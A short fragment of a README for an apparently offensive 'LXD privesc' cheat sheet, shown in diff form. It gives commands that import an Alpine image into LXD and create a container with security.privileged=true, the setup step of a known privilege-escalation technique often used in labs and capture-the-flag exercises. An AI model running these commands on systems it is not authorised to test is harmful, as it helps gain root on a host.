Cone-Virus/LXD-Privesc-CheatSheet/README.md

 lxc image import alpine-v3.12-i868-20200831_1748.tar.gz --alias temper

--Next we setup the LXD image on local with escalated priv
+-Next we setup the LXD image on local with escalated priv -"temper" is the alias of the image
+-"hereiam" is the alias of the user you are creating on the image

 lxc init temper hereiam -c security.privileged=true